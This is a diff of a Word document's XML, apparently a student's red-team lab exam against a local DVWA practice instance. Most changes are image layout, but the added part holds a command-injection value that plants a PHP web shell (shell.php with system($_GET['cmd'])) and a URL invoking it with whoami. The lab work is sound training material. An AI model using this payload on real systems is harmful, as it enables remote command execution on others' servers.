--- a/EJERCICIOS DE LOS ALUMNOS/JESUS/examen_proyecto_blue_team_red_team.docx
+++ b/EJERCICIOS DE LOS ALUMNOS/JESUS/examen_proyecto_blue_team_red_team.docx
@@ -122,9 +122,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28974ECF" wp14:editId="770A60EE">
-            <wp:extent cx="5400040" cy="1925955"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28974ECF" wp14:editId="5916A041">
+            <wp:extent cx="4514850" cy="1610247"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="259860692" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -145,7 +145,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="1925955"/>
+                      <a:ext cx="4526341" cy="1614345"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -175,9 +175,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2855E181" wp14:editId="55FAFB96">
-            <wp:extent cx="5400040" cy="3657600"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2855E181" wp14:editId="242D36D8">
+            <wp:extent cx="4600575" cy="3116100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="1375904103" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -198,7 +198,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="3657600"/>
+                      <a:ext cx="4611671" cy="3123615"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -252,10 +252,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="248B7806" wp14:editId="73EFF6F7">
-            <wp:extent cx="5400040" cy="3081020"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="248B7806" wp14:editId="15F0E0C6">
+            <wp:extent cx="4657725" cy="2657488"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="297297984" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -276,7 +277,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="3081020"/>
+                      <a:ext cx="4666613" cy="2662559"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -296,8 +297,8 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C8E518B" wp14:editId="505D553E">
-            <wp:extent cx="5400040" cy="541020"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C8E518B" wp14:editId="4EF84572">
+            <wp:extent cx="4810125" cy="481918"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="496531319" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
@@ -319,7 +320,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="541020"/>
+                      <a:ext cx="4858233" cy="486738"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -332,10 +333,6 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -363,53 +360,10 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:t>Colocar ip en el navegador</w:t>
       </w:r>
     </w:p>
@@ -419,9 +373,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F59D4D7" wp14:editId="7B20026D">
-            <wp:extent cx="5400040" cy="3287395"/>
-            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F59D4D7" wp14:editId="050B40A3">
+            <wp:extent cx="4619625" cy="2812300"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
             <wp:docPr id="1926057605" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -442,7 +396,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="3287395"/>
+                      <a:ext cx="4626833" cy="2816688"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -463,10 +417,18 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Escaneo con Nikton</w:t>
       </w:r>
     </w:p>
@@ -514,9 +476,220 @@
     </w:p>
     <w:p/>
     <w:p/>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>192.168.0.91;echo</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> '&lt;?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>($_GET["</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"])</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>; ?</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>&gt;' &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/www/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>html</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/DVWA/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43695A14" wp14:editId="6237772C">
+            <wp:extent cx="5400040" cy="2319020"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1144133442" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1144133442" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2319020"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>https://192.168.0.91/DVWA/shell.php?cmd=whoami</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57971F3E" wp14:editId="2B171FF4">
+            <wp:extent cx="5400040" cy="763270"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1961750864" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1961750864" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="763270"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -l http://192.168.0.91</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2952FF23" wp14:editId="283AFB06">
+            <wp:extent cx="5400040" cy="2326640"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="842879973" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="842879973" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2326640"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -1444,6 +1617,29 @@
       <w:spacing w:val="5"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Hipervnculo">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="000F3F43"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Mencinsinresolver">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="000F3F43"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/EJERCICIOS DE LOS ALUMNOS/JESUS/examen_proyecto_blue_team_red_team.docx
+++ b/EJERCICIOS DE LOS ALUMNOS/JESUS/examen_proyecto_blue_team_red_team.docx
@@ -2,6 +2,23 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>PRACTICA REALIZADA COMO RED TEAM</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -409,7 +426,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Colocar ip en el navegador</w:t>
       </w:r>
     </w:p>
